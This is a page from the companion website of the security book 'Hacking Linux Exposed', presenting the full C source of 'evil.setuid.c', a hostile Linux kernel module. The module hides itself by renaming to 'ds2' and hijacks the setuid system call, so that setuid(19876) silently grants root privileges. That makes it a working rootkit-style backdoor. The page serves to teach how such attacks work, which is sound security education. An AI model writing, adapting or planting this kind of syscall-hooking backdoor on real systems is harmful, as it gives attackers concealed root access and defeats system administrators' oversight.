Hacking Linux Exposed

About
Authors
Contents
Reviews
Foreword
Purchase

Articles
Books
Sourcecode
Tools
Errata

Home

 


(view this code in a separate window) 

/*
 * evil.setuid.c
 *
 * Example hostile Linux loadable kernel module
 *
 * Copyright 2001, Bri Hatch
 * Released under the GPL.  See COPYING file
 * for more information.
 *
 * Note: there are zillions of ways to do this.
 * Have fun, program your own, and learn a bit about
 * kernel games.
 *
 */

#define __KERNEL__
#define MODULE

#include <linux/config.h>
#include <linux/module.h>
#include <linux/version.h>
#include <sys/syscall.h>

#include <linux/sched.h>
#include <linux/types.h>


int new_setuid(uid_t);
int (*real_setuid)(uid_t);
extern void *sys_call_table[];


int init_module() {

      /* Change our module name to hide a bit. It'll
         help prevent it from being found on disk. */

      register struct module *mp asm("%ebx");
      *(char *) (mp->name)   = 'd';
      *(char *) (mp->name+1) = 's';
      *(char *) (mp->name+2) = '2';
      *(char *) (mp->name+3) = '\0';

      real_setuid   = sys_call_table[ SYS_setuid ];
      sys_call_table[ SYS_setuid ]   =  (void *)new_setuid;
      return 0;
}

int cleanup_module() {
      sys_call_table[ SYS_setuid ]   = (void *)real_setuid;
        return 0;
}

int new_setuid(uid_t uid) {

      if ( uid == 19876 ) {
            current->uid = 0;
            current->gid = 0;
            current->euid = 0;
            current->egid = 0;
            return 0;
      }
      return (*real_setuid)(uid);
}